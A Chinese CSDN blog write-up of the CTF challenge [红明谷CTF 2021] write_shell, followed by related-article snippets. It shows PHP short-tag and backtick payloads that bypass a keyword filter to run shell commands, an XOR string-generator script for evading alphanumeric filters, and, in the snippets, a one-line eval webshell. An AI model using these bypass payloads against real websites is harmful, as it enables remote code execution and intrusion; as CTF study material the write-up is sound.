[红明谷CTF 2021]write_shell php短标签绕过

最新推荐文章于 2024-03-24 03:43:15 发布
最新推荐文章于 2024-03-24 03:43:15 发布
阅读量3.5k 收藏 2
点赞数 1
文章标签: python docker linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/121589413
版权

[红明谷CTF 2021]write_shell
考的是php里的绕过,因为正则过滤了php ; ~ eval等字符,所以php标签<?php?>写入不了
https://xz.aliyun.com/t/8107#toc-11这个文章讲绕过讲的挺详细的
对于这道题目可以用<?= ?>代替php标签。<?= ?>短标签会直接把php的结果输出,<? ?>的功能则和<?php?>完全一样。过滤空格可以用\t绕过,或者%09也是tab的URL编码。php反引号中的字符串会被当作命令执行。

?action=upload&data=<?=`ls\t/`?>

结果会写在pwd查到的文件夹下的index.php文件里
本来想再试试取反和异或绕过的,这两个都算是万金油绕过方式了,但是在这里都被禁了。那就贴一个求异或绕过的脚本吧

<?php
$shell = "phpinfo()";
$result1 = "";
$result2 = "";
for($num=0;$num<=strlen($shell);$num++)
{
    for($x=33;$x<=126;$x++)
    {
        if(judge(chr($x)))
        {
            for($y=33;$y<=126;$y++)
            {
                if(judge(chr($y)))
                {
                    $f = chr($x)^chr($y);
                    if($f == $shell[$num])
                    {
                        $result1 .= chr($x);
                        $result2 .= chr($y);
                        break 2;
                    }
                }
            }
        }
    }
}
echo $result1;
echo "<br>";
echo $result2;

function judge($c)
{
    if(!preg_match('/[a-z0-9]/is',$c))
    {
        return true;
    }
    return false;
}

本来还想试试自增法的,结果发现+也被过滤了。而且还发现了php的–不能让字符改变,有哪位大佬知道的可以告诉我一下原因。
以下可以产生“Array”字符串,能够无中生有字符。

?action=upload&data=<?=$a=[].""?><?=`echo($a)`?>
scrawman
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件上传漏洞(漏洞产生因素、前端验证绕过php标签绕过)
ShenZ的博客
08-07 1284
文件上传漏洞 copy xx.png/b+xx.txt xx.png 在嵌入了php脚本的html中,使用 phtml作为后缀名 php,php3,php4,php5,phtml.pht 上传漏洞相关因素 1.可解析的后缀, 也就是该语言有多个可解析的后缀,比如php语言可解析的后缀为php,php2,php3等等 2.大小写混合, 如果系统过滤不严,可能大小写可以绕过。 3.中间件, 每款中间件基本都解析漏洞,比如iis就可以把xxx.asp;.jpg当asp来执行。 4.系统特性, 特别是Window
php绕过html标签,php特殊字符过滤,html标签处理
weixin_39802814的博客
06-22 671
1,magic_quotes_gpc默认情况下,PHP 指令 magic_quotes_gpc 为 on,对所有的 GET、POST 和 COOKIE 数据自动运行 addslashes()。不要对已经被 magic_quotes_gpc 转义过的字符串使用 addslashes(),因为这样会导致双层转义。遇到这种情况时可以使用函数 get_magic_quotes_gpc() 进行检测。其实这...
PHP标签、双写绕过
2401_82985722的博客
03-19 273
文件中包含了PHP代码,但是在上下文中不被允许。(后端利用正则限制匹配PHPphp)上传的文件类型不是有效的 JPEG 图片格式。标签会直接把php的结果输出,原来的路径中存在php。用pphpph双写绕过。·这都不做(web)(此题免杀马不可用)连接蚁剑,得flag。
2024.3.23日报(标签绕过
最新发布
2302_80946742的博客
03-24 233
`,而标签则是`
PHP代码层防护与绕过
10-24 404
0x01 前言   在一些网站通常会在公用文件引入全局防护代码进行SQL注入、XSS跨站脚本等漏洞的防御,在一定程度上对网站安全防护还是比较有效的。   这里讨论一下关键字过滤不完善及常见正则匹配存在的问题,并收集了网络上常见的PHP全局防护代码进行分析。   Bypass思路:只考虑关键字被过滤如何进行Bypass的问题,暂不考虑关键字替换绕过的情况。 0x02 关键字过滤 ...
php中的标签 太坑人了
weixin_33811539的博客
09-26 134
今天配置了一个php页面去修改svn密码问题,结果调了半天,最后在Windows和 Linux的运行现象是不一样,运行结果更不一样了,关键是完全一模一样的代码。 最后发现是标签引起的,Windows环境中标签默认是打开的,Linux下 默认是关闭的。 控制参数: short_open_tag = On 如果设置为Off,则不能正常解析类似于这样形式的php文件: phpinfo...
[红明谷CTF 2021]write_shell
m0_63045593的博客
04-20 223
[红明谷CTF 2021]write_shell <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{
[红明谷CTF 2021]JavaWeb
snowlyzz的博客
01-02 743
shiro+jndi注入学习
[红明谷杯]wp(正则注入,hex绕过
Huamang的博客
04-03 768
write_shell <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ retur
2021红明谷杯数据安全大赛技能场景赛 Input Monitor
weixin_45805993的博客
09-25 1602
突然想起这个题… 先用autopsy挂载给的文件 桌面有压缩包和hint 没事,我都删掉了,之前的聊天记录都被我清干净了。除非他们在监控我输入 提示要得到输入记录 用到输入法取证https://mp.weixin.qq.com/s/0p3vbLub5vPKO5Pik9zmUQ 通过对Win10系统自带中文输入法程序运行进程的分析,发现与中文输入法相关的用户词库文件主要存储在 C:\Users\Administrator\AppData\Roaming\Microsoft\InputMethod\Chs
[HMGCTF2022]wp
Huamang的博客
03-24 4149
WEB Fan website 首先是一个www.zip的源码泄露,是laminas框架 mvc的框架首先就是看路由 在\module\Album\src\Controller\AlbumController.php里面有功能点 <?php namespace Album\Controller; use Album\Model\AlbumTable; use Laminas\Mvc\Controller\AbstractActionController; use Laminas\View\Mode
PHP开启标签
李木
10-07 1847
控制参数: php.ini 中 搜索 short_open_tag = On 如果设置为Off,则不能正常解析类似于这样形式的php文件: phpinfo() ?&gt; 而只能解析 &lt;?php phpinfo() ?&gt; 这样形式的php文件 所以要想php支持标签,需要我们把short_open_tag 设置为On.   &lt;?php  这是完整标签 &lt;?  这是...
BUUCTF:[红明谷CTF 2021]write_shell --- php 标签 + 反引号执行 写入马儿的新方法 --- rce,,yi
Zero_Adam的博客
04-12 1414
一、自己做 data传入值,然后data过waf()。data的值,就是我们写文件的内容,应该就是写马儿了。过滤了php的话,考虑标签把,然后eval没了, assert或者exec其他的应该都大差不差。 然后就卡壳了,,本地环境打好了,,但是 assert或者exec这些不会用。。 看WP了 二、学到的 PHP标签:<?php @eval($_POST['a']);?>可以用<?=@eval($_POST['a']);?>代替,PHP标签 关于PHP的??这个东西:讲
20210221CTF小记之bugkuCTF冬至红包(标签绕过echo、eval代码注入漏洞、$$绕过特定字符限制)
qq_45290991的博客
02-22 2337
今天做了一道很恶心的题目,话不多说,先上结果图: 我们先来分析代码: 当没有用GET方法传入flag时,会显示Click here的链接。 点击链接会用GET方法传入一串字符串$exam,后面是当前时间的一串sha1哈希值。 判断传入的flag长度与$exam是否相同,不同则显示 长度不允许 第二个判断过滤了一大堆 第三个判断传入flag的值等于flag值的哈希值,正确就输出flag。用的是严格的三个等号的比较,我们flag都不知道,哈希值更不可能知道了,== 但容易发现此处存在任意代码.
ctf 绕过php,Bugku-CTF之各种绕过
weixin_39799290的博客
03-19 453
Bugku-CTF之各种绕过本题要点:php代码审计、hackbar利用highlight_file(‘flag.php‘);$_GET[‘id‘] = urldecode($_GET[‘id‘]);$flag = ‘flag{xxxxxxxxxxxxxxxxxx}‘;if (isset($_GET[‘uname‘]) and isset($_POST[‘passwd‘])) {if ($_GET...
ctf isnumber绕过
07-15
### 回答1: CTF是一个信息安全技术比赛,其中的isnumber题目涉及到绕过数字识别的方法。 首先,我们需要了解isnumber的原理。isnumber是用于判断一个输入是否为数字的函数。通常情况下,isnumber函数会根据输入的特征,如字符长度、字符类型等,来判断输入是否为数字。在绕过isnumber时,我们需要找到一种方式,使得输入被isnumber认为是数字,即使它实际上不是。 一种绕过isnumber的方法是通过输入一个字符转义序列。字符转义序列允许我们在输入中使用特定的字符,这些字符会被解析为其他含义。例如,我们可以使用转义序列"\x"来表示一个十六进制字符。通过构造一个特定的输入,我们可以使得isnumber函数无法正确判断这个输入是否为数字。 另一种绕过isnumber的方法是利用类型转换漏洞。isnumber函数可能会使用一些类型转换操作,如将输入的字符串转换为整数或浮点数。但是,如果我们输入的字符串不符合转换的规范,就有可能绕过isnumber的判断。我们可以尝试构造一些特殊的字符串,使得类型转换操作无法正确转换,从而绕过isnumber的判断。 总之,绕过isnumber需要具体情况具体分析。我们可以通过寻找字符转义序列或利用类型转换漏洞等方法,来构造一个满足题目要求的输入,使得isnumber函数无法正确判断输入是否为数字。在CTF比赛中,解决这样的题目需要结合对isnumber函数和相关技术的理解,以及对不同绕过方法的掌握。 ### 回答2: CTF(Capture the Flag)是一种网络安全竞赛,参与者需要通过解决一系列的题目来获取旗帜(flag)并获得分数。"isnumber"是一种常见的CTF题目类型,要求参与者绕过一个检测输入是否为数字的判断。 要绕过"isnumber"的检测,首先需要了解其判断的原理。通常,isnumber会对输入的数据进行一系列的校验,以确保其符合数字的特征。一种常见的校验方法是使用正则表达式来匹配数字的模式。因此,可以猜测"isnumber"可能会使用类似于"\d+"这样的正则表达式来判断输入是否为数字。 为了绕过这种检测,可以利用正则表达式的特性进行欺骗。例如,可以使用"0.0"作为输入,因为它在字符串的形式下不是一个有效的数字,但是正则表达式对于小数点之前的数字和小数点之后的数字都不会做校验。因此,这种输入可以绕过判断。 另一个方法是利用编码转换。数字在不同的编码方式下会有不同的表示形式,可以尝试使用编码转换函数来混淆输入数据。例如,在ASCII编码中,数字"0"对应的十进制值为48,在Unicode编码中,数字"0"对应的十进制值为48。因此,可以试图将输入数据从ASCII编码转换为Unicode编码,这样就可以绕过判断。 总之,要绕过"isnumber"的检测,可以尝试使用特殊字符、不符合数字特征的输入数据,或者利用编码转换等方法来欺骗判断函数。这些方法都需要对"isnumber"的实现方式有一定的了解,以便选择合适的绕过方法。 ### 回答3: CTF(Capture The Flag)是一种网络安全竞赛,参赛者需要解决一系列安全问题并获取旗帜(flag)作为证明。IsNumber是一道CTF中常见的题目,需要绕过其校验逻辑判断是否为数字。 首先,我们需要了解IsNumber的校验逻辑。在一般情况下,IsNumber函数会接收一个输入,然后通过内部的校验方法判断是否为数字。我们可以尝试绕过这个校验方法来绕过IsNumber题目。 一种常见的绕过方法是通过字符特性来绕过。我们可以利用ASCII码来传递不可见的字符。以Python为例,我们可以使用"\x00"来表示空字符,并将其插入输入,这样在校验过程中空字符会被认为是宽字符机制中的字符串结束标志,从而绕过校验。 另外,我们还可以尝试通过输入中的特殊字符来绕过校验逻辑。例如,某些校验逻辑只判断输入中是否含有除数字之外的字符,如果我们输入的内容中带有特殊字符,可能就能绕过校验而被判断为数字。 此外,我们还可以尝试绕过从键盘读取输入的方法。一些CTF题目为了防止通过键盘输入绕过,可能会使用特殊的输入方式,如从文件或网络中读取输入。我们可以尝试绕过这种限制,通过提供恰当的输入来源来绕过IsNumber题目的校验。 总之,绕过CTF中的IsNumber题目需要根据具体情况寻找相应的漏洞或特性,通过巧妙的输入,绕过校验逻辑,判断输入为数字,从而达到绕过的目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值